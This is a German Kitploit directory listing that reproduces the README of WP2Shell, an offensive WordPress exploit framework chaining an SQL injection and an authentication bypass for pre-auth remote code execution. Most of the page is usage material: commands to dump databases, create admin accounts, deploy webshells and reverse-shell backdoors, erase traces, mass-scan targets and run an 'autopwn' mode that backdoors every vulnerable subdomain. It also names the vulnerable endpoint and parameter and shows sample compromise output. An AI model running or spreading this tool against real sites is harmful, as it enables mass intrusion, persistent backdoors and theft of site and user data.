Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
WP2Shell — Modulares WordPress-Pre-Auth-Exploit-Framework, das SQL-Injection und Authentifizierungsumgehung kombiniert, um Remote-Codeausführung, interaktive Shells, Backdoors und Massen-Schwachstellenscanning zu ermöglichen. | Kitploit
Tools/GitHubGitHub/g0d150ne/wp2shell
Penetrationstest-FrameworksAufklärungSchwachstellenscannerExploit-FrameworksPersistenzmechanismenExploitationWebanwendungs-ExploitationWAF-UmgehungRemote-Access-ToolPayload-Entwicklung
GitHubg0d150ne/wp2shell
vor 10 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

WP2Shell

Modulares WordPress-Pre-Auth-Exploit-Framework, das SQL-Injection und Authentifizierungsumgehung kombiniert, um Remote-Codeausführung, interaktive Shells, Backdoors und Massen-Schwachstellenscanning zu ermöglichen.

Repository anzeigen

WP2Shell - WordPress-Pre-Auth-RCE-Exploit

CVE-2026-63030 + CVE-2026-60137
Version: 4.0.0
Autor: G0D150NE

📌 Übersicht

WP2Shell ist ein Full-Chain-Exploit-Tool für die Remote-Codeausführung bei WordPress ohne vorherige Authentifizierung. Es kombiniert zwei kritische Schwachstellen:

  • CVE-2026-63030 - SQL-Injection im Batch-Endpunkt der REST-API
  • CVE-2026-60137 - Authentifizierungsumgehung per oEmbed-Cache-Poisoning

Dieses Tool ermöglicht die vollständige Kompromittierung verwundbarer WordPress-Installationen ohne jegliche Authentifizierung - von der Erkennung bis hin zu vollständiger RCE und Persistenz.

⚡ Funktionen

  • 🔍 Zerstörungsfreie Prüfung - Sichere Bestätigung von Schwachstellen
  • 📊 Extraktion mit mehreren Techniken - UNION, error-basiert, Blind-SQLi
  • 🚀 Vollständige RCE-Kette - Von SQLi bis zur Erstellung eines Admin-Kontos
  • 🐚 Webshell-Bereitstellung - Versteckter Backdoor auf Plugin-Basis
  • 🧹 Cleanup-Funktion - Entfernt alle Spuren
  • 📡 Massen-Scanning - Multithread-Scanner für mehrere Ziele
  • 🤖 Autopwn-Modus - Subdomain-Erkennung + automatische Ausnutzung
  • 🌐 Proxy-Rotation - Unterstützung für rotierende Proxys
  • 🕵️ Stealth-Modus - Zufällige Verzögerungen und WAF-Bypass-Techniken

🔧 Installation

root@kitploit:~
# Clone repository
git clone https://github.com/g0d150ne/wp2shell.git
cd wp2shell

# No dependencies needed - uses Python 3.8+ standard library
chmod +x wp2shell.py

🎯 Verwendung

Befehlsstruktur

root@kitploit:~
python3 wp2shell.py [COMMAND] [OPTIONS] [TARGET]

Verfügbare Befehle

🚀 Beispiele

1. Schwachstellenprüfung

root@kitploit:~
python3 wp2shell.py check https://target.com
root@kitploit:~
python3 wp2shell.py check https://target.com --confirm-timing --sleep 5

2. Datenextraktion

Basis-Fingerprint:

root@kitploit:~
python3 wp2shell.py read https://target.com

Benutzer extrahieren:

root@kitploit:~
python3 wp2shell.py read https://target.com --preset users

Benutzerdefinierte Abfrage:

root@kitploit:~
python3 wp2shell.py read https://target.com --query "SELECT @@version"

Gesamte Datenbank dumpen:

root@kitploit:~
python3 wp2shell.py read https://target.com --preset dumpall --max-length 4096

3. Vollständige Ausnutzung

Basis-Exploit:

root@kitploit:~
python3 wp2shell.py exploit https://target.com

Exploit mit interaktiver Shell:

root@kitploit:~
python3 wp2shell.py exploit https://target.com --interactive

Exploit mit Backdoor-Installation:

root@kitploit:~
python3 wp2shell.py exploit https://target.com --backdoor --lhost 192.168.1.100 --lport 4444

Exploit mit Datenbank-Dump:

root@kitploit:~
python3 wp2shell.py exploit https://target.com --dumpdb

Exploit mit Cleanup (Spuren entfernen):

root@kitploit:~
python3 wp2shell.py exploit https://target.com --cleanup

4. Verwendung vorhandener Admin-Anmeldedaten

root@kitploit:~
python3 wp2shell.py shell https://target.com --user admin --password secret123 --interactive
root@kitploit:~
python3 wp2shell.py shell https://target.com --user admin --password secret123 --command "whoami"

5. Massen-Scanning

root@kitploit:~
# Create targets file
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# Scan with 50 threads
python3 wp2shell.py masscan --file targets.txt --threads 50 --output results.csv

6. Autopwn-Modus (Vollautomatisierung)

root@kitploit:~
python3 wp2shell.py autopwn --domain example.com --lhost 192.168.1.100

Dabei wird Folgendes durchgeführt:

  1. Subdomains über crt.sh ermitteln
  2. WordPress-Installationen identifizieren
  3. Alle verwundbaren Websites ausnutzen
  4. Backdoors auf erfolgreich kompromittierten Zielen installieren

🎮 Interaktive Shell

Nach der Ausnutzung erhalten Sie eine vollständige interaktive Shell:

root@kitploit:~
python3 wp2shell.py exploit https://target.com -i
root@kitploit:~
[*] Interactive shell — type 'exit' to quit
/var/www/html $ id
uid=33(www-data) gid=33(www-data)
/var/www/html $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
...
/var/www/html $ exit

🛡️ Optionen-Referenz

Allgemeine Optionen

Optionen für den Befehl „read"

Optionen für den Befehl „exploit"

🔬 Technische Details

Schwachstellenkette

  1. SQL-Injection (CVE-2026-63030)

    • Tritt im Endpunkt /wp-json/batch/v1 auf
    • Der Parameter author_exclude ist anfällig für zeitbasierte Blind-SQLi
    • Ermöglicht UNION- und error-basierte Extraktion
  2. Authentifizierungsumgehung (CVE-2026-60137)

    • oEmbed-Cache-Poisoning über den /_embed-Parameter
    • Ermöglicht die Erstellung von Admin-Benutzern über Customizer-Changeset
    • Löst eine Re-Entry-Kette zur Erstellung privilegierter Konten aus

Unterstützte WordPress-Versionen

Extraktionstechniken

📊 Ausgabebeispiele

Erfolgreiche Ausnutzung

root@kitploit:~
░▒▓█▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓███████▓▒░▒▓███████▓▒░ ░▒▓███████▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓████████▓▒░▒▓█▓▒░      ░▒▓█▓▒░        
                                                                                                                                                                                                                            
  CVE-2026-63030 + CVE-2026-60137
  WordPress Pre-Auth RCE  [v4.0.0]
  + G0D150NE

[1/7] Reconnaissance
  Target: https://target.com
  WordPress 6.9.3
[+] UNION extraction available (in-band, 1 request/value)

[2/7] Enumerating target
[+] Discovered table prefix: wp_

[3/7] Locating embed target
[+] Embed URL: https://target.com/2020/01/01/hello-world/

[4/7] Seeding oEmbed cache posts
[+] Seed payload delivered

[5/7] Extracting cache post IDs
[+] Cache IDs: [12345, 12346, 12347, 12348]

[6/7] Triggering escalation chain
[+] Administrator created via re-entry chain

[7/7] Deploying webshell
[+] Authenticated
[+] RCE confirmed
  uid: www-data

[+] ========================================================
[+]   TARGET COMPROMISED
[+]   Admin:  wp_service_a1b2 / G7hK9xQw2p$L!mN
[+]   Shell:  https://target.com/wp-content/plugins/cache_a1b2/cache_a1b2.php
[+] ========================================================

⚠️ Haftungsausschluss

Dieses Tool dient ausschließlich autorisierten Sicherheitstests und Bildungszwecken. Die Verwendung gegen Systeme ohne ausdrückliche Genehmigung ist illegal. Die Autoren übernehmen keinerlei Verantwortung für Missbrauch.

📚 Referenzen

  • CVE-2026-63030
  • CVE-2026-60137
  • WordPress-Sicherheitshinweis
  • WP2Shell-Technikblog

🤝 Mitwirken

Einen Fehler gefunden? Möchten Sie das Tool verbessern? Pull-Requests sind willkommen!

  1. Repository forken
  2. Feature-Branch erstellen
  3. Änderungen committen
  4. Branch pushen
  5. Pull-Request eröffnen

📄 Lizenz

MIT-Lizenz - Details finden Sie in der LICENSE-Datei.

Tool herunterladen
BefehlBeschreibung
checkZerstörungsfreie Bestätigung von Schwachstellen
readDaten per SQL-Injection extrahieren
exploitVollständige Pre-Auth-RCE-Kette
shellWebshell mit vorhandenen Anmeldedaten bereitstellen
masscanMehrere Ziele massenhaft scannen
autopwnAutomatische Erkennung → Scan → Exploit
OptionBeschreibung
--timeoutHTTP-Timeout in Sekunden (Standard: 30)
--proxiesKommagetrennte Proxy-Liste (z. B. http://127.0.0.1:8080)
--stealthStealth-Modus mit zufälligen Verzögerungen aktivieren
-v, --verboseDebug-Ausgabe aktivieren
-q, --quietBanner- und Informationsmeldungen unterdrücken
OptionBeschreibung
--prefixTabellenpräfix (Standard: wp_)
--auto-prefixTabellenpräfix automatisch ermitteln
--max-lengthMaximale Zeichen pro Wert (Standard: 128)
--techniqueExtraktionstechnik: auto/union/error/blind
--presetDatenvoreinstellung: fingerprint/users/dumpall
--queryBeliebiger SQL-Ausdruck zum Extrahieren
OptionBeschreibung
--prefixTabellenpräfix (Standard: wp_)
--no-discoverAutomatische Erkennung überspringen, Standardwerte verwenden
-i, --interactiveNach der Ausnutzung eine Shell öffnen
-c, --commandNach der Ausnutzung einen einzelnen Befehl ausführen
--backdoorPersistenz-Backdoor installieren
--lhostLHOST für Reverse-Shell (Standard: 10.0.0.1)
--lportLPORT für Reverse-Shell (Standard: 4444)
--dumpdbDatenbank nach der Ausnutzung dumpen
--cleanupErstellten Benutzer und Webshell beim Beenden löschen
VersionStatus
6.9.0✅ Verwundbar
6.9.1✅ Verwundbar
6.9.2✅ Verwundbar
6.9.3✅ Verwundbar
6.9.4✅ Verwundbar
7.0.0✅ Verwundbar
7.0.1✅ Verwundbar
≥ 7.0.2❌ Behoben
TechnikGeschwindigkeitDatengrößeAnforderungen
UNION⚡ Sehr schnellUnbegrenztZiel darf UNION nicht filtern
Error🚀 Schnell~30 Zeichen/AnfrageZiel muss Fehlermeldungen ausgeben
Blind🐢 LangsamUnbegrenztBoolesches Orakel verfügbar